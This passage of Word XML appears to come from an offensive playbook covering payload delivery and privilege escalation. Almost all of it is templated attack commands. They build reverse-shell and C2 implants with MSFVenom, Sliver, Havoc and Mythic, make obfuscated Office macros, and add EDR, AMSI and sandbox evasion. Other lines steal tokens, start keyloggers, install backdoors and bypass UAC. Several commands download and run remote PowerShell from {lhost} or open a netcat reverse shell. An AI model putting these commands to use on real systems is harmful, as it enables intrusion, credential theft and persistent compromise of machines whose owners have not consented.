          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Develop, encode, and deliver payloads for exploitation. Create custom shellcode, implants, and delivery mechanisms tailored to the target environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="59" w:name="tool-4.1-msfvenom"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 4.1 — MSFVenom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit payload generator — the Swiss Army knife of payload creation.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Reverse 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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f exe -o /opt/tsec/output/4.1.1_msfvenom_win_rev.exe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Reverse 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msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f elf -o /opt/tsec/output/4.1.2_msfvenom_linux_rev.elf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Reverse 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msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f macho -o /opt/tsec/output/4.1.3_msfvenom_macos_rev.macho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Payload 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msfvenom -p php/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f raw -o /opt/tsec/output/4.1.4_msfvenom_php_rev.php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Payload ASPX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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f aspx -o /opt/tsec/output/4.1.5_msfvenom_aspx_rev.aspx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Payload JSP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msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -f raw -o /opt/tsec/output/4.1.6_msfvenom_jsp_rev.jsp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msfvenom -p cmd/unix/reverse_python LHOST={lhost} LPORT={lport} -f raw -o /opt/tsec/output/4.1.7_msfvenom_python_rev.py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msfvenom -p android/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -o /opt/tsec/output/4.1.8_msfvenom_android_rev.apk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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -e x64/xor -i 5 -f exe -o /opt/tsec/output/4.1.9_msfvenom_encoded.exe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Formats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msfvenom --list formats &gt; /opt/tsec/output/4.1.10_msfvenom_formats.txt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59"/>
    <w:bookmarkStart w:id="60" w:name="tool-4.2-sliver-c2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 4.2 — Sliver C2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modern cross-platform C2 framework with advanced implant generation.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Implant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--mtls {lhost}:{lport} --os windows --arch amd64 --save /opt/tsec/output/4.2.1_sliver_implant.exe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Implant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--http https://{lhost} --os linux --arch amd64 --save /opt/tsec/output/4.2.2_sliver_https.elf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Implant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--dns {domain} --os macos --arch arm64 --save /opt/tsec/output/4.2.3_sliver_dns.macho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stager --lhost {lhost} --lport {lport} --format csharp --save /opt/tsec/output/4.2.4_sliver_stager.cs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--http {lhost}:{lport} --format shellcode --save /opt/tsec/output/4.2.5_sliver_shellcode.bin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--mtls {lhost}:{lport} --format service --save /opt/tsec/output/4.2.6_sliver_service.exe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--mtls {lhost}:{lport} --format shared --save /opt/tsec/output/4.2.7_sliver_shared.so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--wg {lhost}:{lport} --os windows --arch amd64 --save /opt/tsec/output/4.2.8_sliver_wg.exe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profiles new --mtls {lhost} --http {domain} --format exe,shellcode {profile_name} &gt; /opt/tsec/output/4.2.9_sliver_profile.txt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implants &gt; /opt/tsec/output/4.2.10_sliver_implants.txt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60"/>
    <w:bookmarkStart w:id="61" w:name="tool-4.3-havoc-c2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 4.3 — Havoc C2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modern C2 framework with Demon agent and advanced evasion.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Demon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exe --output /opt/tsec/output/4.3.1_havoc_demon.exe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Shellcode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shellcode --output /opt/tsec/output/4.3.2_havoc_shellcode.bin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dll --output /opt/tsec/output/4.3.3_havoc_dll.dll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service-exe --output /opt/tsec/output/4.3.4_havoc_service.exe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powershell --output /opt/tsec/output/4.3.5_havoc_ps1.ps1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Listener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listener create --name {name} --protocol http --hosts {lhost} --port {lport} --uris /api/v1,/data &gt; /opt/tsec/output/4.3.6_havoc_listener.txt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Mask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--sleep-obf --format exe --output /opt/tsec/output/4.3.7_havoc_sleep.exe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Steal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token steal {pid} &gt; /opt/tsec/output/4.3.8_havoc_token.txt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shellcode inject {pid} {shellcode_file} &gt; /opt/tsec/output/4.3.9_havoc_inject.txt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exe --sleep-obf --export /opt/tsec/output/4.3.10_havoc_full.exe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</w:tbl>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkStart w:id="62" w:name="tool-4.4-mythic"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 4.4 — Mythic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Collaborative red teaming platform with multi-agent support.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Apollo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mythic-cli install github SpecterOps/apollo &amp;&amp; mythic-cli start apollo &gt; /opt/tsec/output/4.4.1_mythic_apollo.txt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Poseidon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mythic-cli install github SpecterOps/poseidon &amp;&amp; mythic-cli start poseidon &gt; /opt/tsec/output/4.4.2_mythic_poseidon.txt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mythic-cli payload create --type apollo --c2-profile http --callback-host {lhost} &gt; /opt/tsec/output/4.4.3_mythic_payload.txt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mythic-cli c2 create --type http --callback-host {lhost} --callback-port {lport} --get-uri /api/data &gt; /opt/tsec/output/4.4.4_mythic_c2.txt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mythic-cli payload create --type poseidon --callback-interval 10 --callback-jitter 20 &gt; /opt/tsec/output/4.4.5_mythic_callback.txt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mythic-cli file upload --file {local} --remote {remote_path} &gt; /opt/tsec/output/4.4.6_mythic_upload.txt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mythic-cli action screenshot --payload {payload_id} &gt; /opt/tsec/output/4.4.7_mythic_screenshot.png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mythic-cli action tokens --payload {payload_id} --action steal &gt; /opt/tsec/output/4.4.8_mythic_tokens.txt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Keylog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mythic-cli action keylog --payload {payload_id} --action start &gt; /opt/tsec/output/4.4.9_mythic_keylog.txt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mythic-cli payload create --type apollo --c2-profile http,dns --callback-host {lhost} --format exe,shellcode &gt; /opt/tsec/output/4.4.10_mythic_full.txt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62"/>
    <w:bookmarkStart w:id="63" w:name="tool-4.5-macropack"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 4.5 — MacroPack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Generate obfuscated macros, VBS, and payloads for Office documents.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 Macro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macro_pack.exe -t {payload_file} -o -G /opt/tsec/output/4.5.1_macropack_macro.doc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XLM Macro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macro_pack.exe -t {payload_file} --xlm -o -G /opt/tsec/output/4.5.2_macropack_xlm.xls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DDE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macro_pack.exe --dde -t {payload_file} -G /opt/tsec/output/4.5.3_macropack_dde.docx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macro_pack.exe -t {payload_file} --template -G /opt/tsec/output/4.5.4_macropack_template.dotm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macro_pack.exe -t {payload_file} --hta -G /opt/tsec/output/4.5.5_macropack_hta.hta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macro_pack.exe -t {payload_file} --sct -G /opt/tsec/output/4.5.6_macropack_sct.sct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Obfuscation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macro_pack.exe -t {payload_file} --obfuscate -G /opt/tsec/output/4.5.7_macropack_obf.doc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macro_pack.exe -t {payload_file} --embed {embedded} -G /opt/tsec/output/4.5.8_macropack_embed.doc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Shortcut LNK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macro_pack.exe -t {payload_file} --shortcut -G /opt/tsec/output/4.5.9_macropack_shortcut.lnk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macro_pack.exe -t {payload_file} --xlm --obfuscate --embed {stage2} -G /opt/tsec/output/4.5.10_macropack_full.xls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XLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="64" w:name="tool-4.6-donut"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 4.6 — Donut</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Convert .NET assemblies to position-independent shellcode.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donut -f {assembly}.exe -o /opt/tsec/output/4.6.1_donut_shellcode.bin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Class/Method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donut -f {assembly}.dll -c {class} -m {method} -o /opt/tsec/output/4.6.2_donut_targeted.bin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donut -f {assembly}.exe -p '{parameters}' -o /opt/tsec/output/4.6.3_donut_params.bin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Entropy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donut -f {assembly}.exe -e 2 -o /opt/tsec/output/4.6.4_donut_entropy.bin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donut -f {assembly}.exe -r {runtime_dll} -o /opt/tsec/output/4.6.5_donut_runtime.bin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AMSI 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donut -f {assembly}.exe -a 1 -o /opt/tsec/output/4.6.6_donut_amsi.bin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WLDP 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donut -f {assembly}.exe -y 1 -o /opt/tsec/output/4.6.7_donut_wldp.bin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donut -f {assembly}.exe -x 1 -o /opt/tsec/output/4.6.8_donut_exit.bin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donut -f {assembly}.exe -z 2 -o /opt/tsec/output/4.6.9_donut_compressed.bin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donut -f {assembly}.exe -a 1 -y 1 -e 3 -z 2 -o /opt/tsec/output/4.6.10_donut_full.bin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</w:tbl>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkStart w:id="65" w:name="tool-4.7-scarecrow"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 4.7 — ScareCrow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">EDR evasion payload creation framework with side-loading.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binary -o /opt/tsec/output/4.7.1_scarecrow_binary.exe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control -o /opt/tsec/output/4.7.2_scarecrow_control.cpl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excel -o /opt/tsec/output/4.7.3_scarecrow_excel.xll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 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msi -o /opt/tsec/output/4.7.4_scarecrow_msi.msi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 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dll -o /opt/tsec/output/4.7.5_scarecrow_dll.dll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EDR Unhook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binary -unhook -o /opt/tsec/output/4.7.6_scarecrow_unhook.exe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-injection {process} -o /opt/tsec/output/4.7.7_scarecrow_inject.exe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Syscall Obf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-syscall zww -o /opt/tsec/output/4.7.8_scarecrow_syscall.exe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-sandbox -o /opt/tsec/output/4.7.9_scarecrow_sandbox.exe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binary -unhook -sandbox -syscall direct -o /opt/tsec/output/4.7.10_scarecrow_full.exe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</w:tbl>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="66" w:name="tool-4.8-sharpshooter"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 4.8 — SharpShooter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Payload delivery framework for HTA, JS, VBS, and VBA.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SharpShooter.py --stageless --dotnetver 4 --payload hta --output /opt/tsec/output/4.8.1_sharpshooter_hta --rawsc {shellcode}.bin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SharpShooter.py --stageless --dotnetver 4 --payload js --output /opt/tsec/output/4.8.2_sharpshooter_js --rawsc {shellcode}.bin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SharpShooter.py --stageless --dotnetver 4 --payload vbs --output /opt/tsec/output/4.8.3_sharpshooter_vbs --rawsc {shellcode}.bin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SharpShooter.py --stageless --dotnetver 4 --payload vba --output /opt/tsec/output/4.8.4_sharpshooter_vba --rawsc {shellcode}.bin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SharpShooter.py --payload js --output /opt/tsec/output/4.8.5_sharpshooter_staged --web {url} --rawsc {shellcode}.bin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Anti-Sandbox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SharpShooter.py --stageless --payload js --sandbox --output /opt/tsec/output/4.8.6_sharpshooter_sandbox --rawsc {shellcode}.bin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AMSI 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SharpShooter.py --stageless --payload js --amsi --output /opt/tsec/output/4.8.7_sharpshooter_amsi --rawsc {shellcode}.bin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SharpShooter.py --stageless --payload js --output /opt/tsec/output/4.8.8_sharpshooter_key --rawsc {shellcode}.bin --key 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Smuggling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SharpShooter.py --stageless --payload js --smuggle --output /opt/tsec/output/4.8.9_sharpshooter_smuggle --rawsc {shellcode}.bin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SharpShooter.py --stageless --payload js --sandbox --amsi --smuggle --output /opt/tsec/output/4.8.10_sharpshooter_full --rawsc {shellcode}.bin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</w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkStart w:id="67" w:name="tool-4.9-unicorn"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 4.9 — Unicorn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell downgrade attack and shellcode injection tool.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powershell &gt; /opt/tsec/output/4.9.1_unicorn_rev.ps1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macro &gt; /opt/tsec/output/4.9.2_unicorn_macro.txt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hta &gt; /opt/tsec/output/4.9.3_unicorn_hta.txt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certutil &gt; /opt/tsec/output/4.9.4_unicorn_certutil.txt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Shellcode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{shellcode_file} powershell &gt; /opt/tsec/output/4.9.5_unicorn_custom.ps1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Encoding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powershell 5 &gt; /opt/tsec/output/4.9.6_unicorn_encoded.ps1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AMSI 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powershell --amsi &gt; /opt/tsec/output/4.9.7_unicorn_amsi.ps1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ETW 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powershell --etw &gt; /opt/tsec/output/4.9.8_unicorn_etw.ps1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powershell --amsi --etw &gt; /opt/tsec/output/4.9.9_unicorn_full.ps1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+ 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macro_hta &gt; /opt/tsec/output/4.9.10_unicorn_macrohta.txt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67"/>
    <w:bookmarkStart w:id="68" w:name="tool-4.10-pwncat"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 4.10 — pwncat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sophisticated post-exploitation platform and bind/reverse shell handler.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pwncat-cs -lp {lport} &gt; /opt/tsec/output/4.10.1_pwncat_listener.txt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pwncat-cs {target}:{port} &gt; /opt/tsec/output/4.10.2_pwncat_connect_{target}.txt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Listener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pwncat-cs -lp {lport} --ssl &gt; /opt/tsec/output/4.10.3_pwncat_ssl.txt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pwncat-cs -lp {lport} --ssl -m linux --identity {key} {user}@{target} &gt; /opt/tsec/output/4.10.4_pwncat_ssh_{target}.txt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Backdoor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pwncat-cs -lp {lport} --install {backdoor_type} &gt; /opt/tsec/output/4.10.5_pwncat_backdoor.txt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Escalate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pwncat-cs -lp {lport} --persist-escalate &gt; /opt/tsec/output/4.10.6_pwncat_escalate.txt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pwncat-cs -lp {lport} -m windows &gt; /opt/tsec/output/4.10.7_pwncat_windows.txt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(pwncat) upload {local_file} {remote_path}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(pwncat) download {remote_file} {local_path}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pwncat-cs -lp {lport} --ssl -m linux --persist-escalate --backdoor &gt; /opt/tsec/output/4.10.10_pwncat_full.txt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80" w:name="phase-5-privilege-escalation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 5: Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Elevate access rights from standard user to administrative or root-level privileges. This phase is critical for achieving full system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="70" w:name="tool-5.1-linpeas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 5.1 — LinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The definitive Linux privilege escalation automation script.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./linpeas.sh &gt; /opt/tsec/output/5.1.1_linpeas.txt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./linpeas.sh -a &gt; /opt/tsec/output/5.1.2_linpeas_full.txt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Supply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./linpeas.sh -P '{password}' &gt; /opt/tsec/output/5.1.3_linpeas_password.txt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./linpeas.sh -N &gt; /opt/tsec/output/5.1.4_linpeas_network.txt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./linpeas.sh -q &gt; /opt/tsec/output/5.1.5_linpeas_quiet.txt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./linpeas.sh -c &gt; /opt/tsec/output/5.1.6_linpeas_container.txt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SUID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./linpeas.sh \| grep -i 'suid' &gt; /opt/tsec/output/5.1.7_linpeas_suid.txt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Writable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./linpeas.sh \| grep -i 'writable' &gt; /opt/tsec/output/5.1.8_linpeas_writable.txt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./linpeas.sh \| grep -i 'cron' &gt; /opt/tsec/output/5.1.9_linpeas_cron.txt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./linpeas.sh -a -N -P '{password}' &gt; /opt/tsec/output/5.1.10_linpeas_maximum.txt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70"/>
    <w:bookmarkStart w:id="71" w:name="tool-5.2-winpeas"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 5.2 — WinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Windows privilege escalation enumeration — the PEASS-ng counterpart.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winPEASany.exe &gt; /opt/tsec/output/5.2.1_winpeas.txt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winPEASany.exe all &gt; /opt/tsec/output/5.2.2_winpeas_full.txt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winPEASany.exe fast &gt; /opt/tsec/output/5.2.3_winpeas_fast.txt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Joined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winPEASany.exe domain &gt; /opt/tsec/output/5.2.4_winpeas_domain.txt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winPEASany.exe \| findstr /i 'service' &gt; /opt/tsec/output/5.2.5_winpeas_services.txt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winPEASany.exe \| findstr /i 'registry' &gt; /opt/tsec/output/5.2.6_winpeas_registry.txt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winPEASany.exe \| findstr /i 'schedule' &gt; /opt/tsec/output/5.2.7_winpeas_scheduled.txt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winPEASany.exe \| findstr /i 'token' &gt; /opt/tsec/output/5.2.8_winpeas_tokens.txt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AutoLogon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winPEASany.exe \| findstr /i 'autologon' &gt; /opt/tsec/output/5.2.9_winpeas_autologon.txt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winPEASany.exe all quiet &gt; /opt/tsec/output/5.2.10_winpeas_comprehensive.txt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71"/>
    <w:bookmarkStart w:id="72" w:name="tool-5.3-gtfonow"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 5.3 — GTFONow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Automated GTFOBins exploitation for misconfigured sudo/SUID.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gtfonow -a &gt; /opt/tsec/output/5.3.1_gtfonow_full.txt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gtfonow -s &gt; /opt/tsec/output/5.3.2_gtfonow_sudo.txt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gtfonow -u &gt; /opt/tsec/output/5.3.3_gtfonow_suid.txt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gtfonow -c &gt; /opt/tsec/output/5.3.4_gtfonow_caps.txt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Exploit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gtfonow -a -e &gt; /opt/tsec/output/5.3.5_gtfonow_exploit.txt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gtfonow -a -v &gt; /opt/tsec/output/5.3.6_gtfonow_verbose.txt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gtfonow -b {binary_path} &gt; /opt/tsec/output/5.3.7_gtfonow_binary.txt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gtfonow -a --safe &gt; /opt/tsec/output/5.3.8_gtfonow_safe.txt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gtfonow -a -o json &gt; /opt/tsec/output/5.3.9_gtfonow.json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gtfonow -a -e -v &gt; /opt/tsec/output/5.3.10_gtfonow_emergency.txt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72"/>
    <w:bookmarkStart w:id="73" w:name="tool-5.4-traitor"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 5.4 — traitor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Automatic Linux privilege escalation exploit tool.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Exploit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./traitor -a &gt; /opt/tsec/output/5.4.1_traitor_auto.txt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./traitor -d &gt; /opt/tsec/output/5.4.2_traitor_docker.txt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Polkit Exploit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./traitor -p &gt; /opt/tsec/output/5.4.3_traitor_polkit.txt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Exploit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./traitor -k &gt; /opt/tsec/output/5.4.4_traitor_kernel.txt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./traitor -s &gt; /opt/tsec/output/5.4.5_traitor_sudo.txt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./traitor -a -v &gt; /opt/tsec/output/5.4.6_traitor_verbose.txt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./traitor -e {exploit_name} &gt; /opt/tsec/output/5.4.7_traitor_specific.txt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./traitor -a --no-color &gt; /opt/tsec/output/5.4.8_traitor_nocolor.txt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./traitor -a -t 120 &gt; /opt/tsec/output/5.4.9_traitor_timeout.txt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./traitor -a -d -p -k -s -v &gt; /opt/tsec/output/5.4.10_traitor_full.txt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73"/>
    <w:bookmarkStart w:id="74" w:name="tool-5.5-linux-exploit-suggester-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 5.5 — Linux Exploit Suggester 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel exploit suggestion tool for Linux systems.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linux-exploit-suggester-2.py --kernel {kernel_version} &gt; /opt/tsec/output/5.5.1_les2_kernel.txt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linux-exploit-suggester-2.py --uname '$(uname -r)' &gt; /opt/tsec/output/5.5.2_les2_current.txt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linux-exploit-suggester-2.py --kernel {version} --download &gt; /opt/tsec/output/5.5.3_les2_download.txt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linux-exploit-suggester-2.py --kernel {version} --full &gt; /opt/tsec/output/5.5.4_les2_full.txt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Applicability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linux-exploit-suggester-2.py --kernel {version} --check &gt; /opt/tsec/output/5.5.5_les2_check.txt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linux-exploit-suggester-2.py --kernel {version} --json &gt; /opt/tsec/output/5.5.6_les2.json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linux-exploit-suggester-2.py --kernel {version} --priority high &gt; /opt/tsec/output/5.5.7_les2_high.txt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Patched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linux-exploit-suggester-2.py --kernel {version} --no-duplicates &gt; /opt/tsec/output/5.5.8_les2_nodup.txt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linux-exploit-suggester-2.py --kernel {version} --sources &gt; /opt/tsec/output/5.5.9_les2_sources.txt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linux-exploit-suggester-2.py --kernel {version} --full --download --json &gt; /opt/tsec/output/5.5.10_les2_assessment.txt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74"/>
    <w:bookmarkStart w:id="75" w:name="tool-5.6-uacme"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 5.6 — UACME</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">User Account Control bypass collection (70+ methods).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akagi64.exe 33 &gt; /opt/tsec/output/5.6.1_uacme_method33.txt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akagi64.exe 65 &gt; /opt/tsec/output/5.6.2_uacme_method65.txt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akagi64.exe 70 &gt; /opt/tsec/output/5.6.3_uacme_method70.txt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akagi64.exe 23 &gt; /opt/tsec/output/5.6.4_uacme_method23.txt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akagi64.exe --list &gt; /opt/tsec/output/5.6.5_uacme_list.txt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akagi64.exe 33 'cmd.exe /c whoami &gt; C:\temp\out.txt' &gt; /opt/tsec/output/5.6.6_uacme_custom.txt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Elevation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akagi64.exe 33 'whoami /groups \| findstr High' &gt; /opt/tsec/output/5.6.7_uacme_verify.txt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PowerShell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akagi64.exe 33 'powershell.exe -enc {base64}' &gt; /opt/tsec/output/5.6.8_uacme_silent.txt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Fileless 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akagi64.exe 33 'powershell -nop -w hidden -c {command}' &gt; /opt/tsec/output/5.6.9_uacme_fileless.txt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akagi64.exe 33 'powershell -nop -c iex(iwr http://{lhost}/{script})' &gt; /opt/tsec/output/5.6.10_uacme_revshell.txt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75"/>
    <w:bookmarkStart w:id="76" w:name="tool-5.7-psexec-sysinternals"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 5.7 — PSExec (Sysinternals)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remote command execution for SYSTEM-level access.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cmd.exe &gt; /opt/tsec/output/5.7.1_psexec_shell_{target}.txt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-s cmd.exe &gt; /opt/tsec/output/5.7.2_psexec_system_{target}.txt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-s whoami &gt; /opt/tsec/output/5.7.3_psexec_whoami_{target}.txt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&amp; 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-c {local_exe} &gt; /opt/tsec/output/5.7.4_psexec_copy_{target}.txt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-i {session} notepad.exe &gt; /opt/tsec/output/5.7.5_psexec_interactive_{target}.txt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-s -i cmd.exe &gt; /opt/tsec/output/5.7.6_psexec_local.txt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{ntlm_hash} -s cmd.exe &gt; /opt/tsec/output/5.7.7_psexec_hash_{target}.txt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-e cmd.exe &gt; /opt/tsec/output/5.7.8_psexec_noprofile_{target}.txt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-d notepad.exe &gt; /opt/tsec/output/5.7.9_psexec_bg_{target}.txt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Remote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-s -c -f {payload_exe} &gt; /opt/tsec/output/5.7.10_psexec_full_{target}.txt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76"/>
    <w:bookmarkStart w:id="77" w:name="tool-5.8-juicypotato-roguepotato"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 5.8 — JuicyPotato / RoguePotato</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">DCOM/RPC privilege escalation via token impersonation.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Exploit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JuicyPotato.exe -l 1337 -c {clsid} -p {program} -a {args} &gt; /opt/tsec/output/5.8.1_juicy_basic.txt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CLSID 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JuicyPotato.exe -l 1337 -p cmd.exe -a '/c whoami &gt; C:\temp\out.txt' &gt; /opt/tsec/output/5.8.2_juicy_autoclsid.txt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Netcat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JuicyPotato.exe -l 1337 -p nc.exe -a '{lhost} {lport} -e cmd.exe' &gt; /opt/tsec/output/5.8.3_juicy_netcat.txt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JuicyPotato.exe -l 1337 -p powershell.exe -a '-enc {base64_command}' &gt; /opt/tsec/output/5.8.4_juicy_powershell.txt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RoguePotato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RoguePotato.exe -r {lhost} -e 'cmd.exe /c whoami' -l 9999 &gt; /opt/tsec/output/5.8.5_rogue.txt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SweetPotato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SweetPotato.exe -p {program} -a {args} &gt; /opt/tsec/output/5.8.6_sweet.txt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PrintSpoofer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PrintSpoofer.exe -c 'cmd.exe /c whoami' &gt; /opt/tsec/output/5.8.7_printspoofer.txt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GodPotato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GodPotato.exe -cmd 'cmd /c whoami' &gt; /opt/tsec/output/5.8.8_godpotato.txt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Coerced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juicypotato.exe -l 1337 -t \* -p {program} -c {clsid} &gt; /opt/tsec/output/5.8.9_juicy_coerced.txt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JuicyPotato.exe -l 1337 -p powershell.exe -a '-nop -w hidden -c iex(iwr http://{lhost}/shell.ps1)' &gt; /opt/tsec/output/5.8.10_juicy_full.txt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77"/>
    <w:bookmarkStart w:id="78" w:name="tool-5.9-watson"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 5.9 — Watson</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
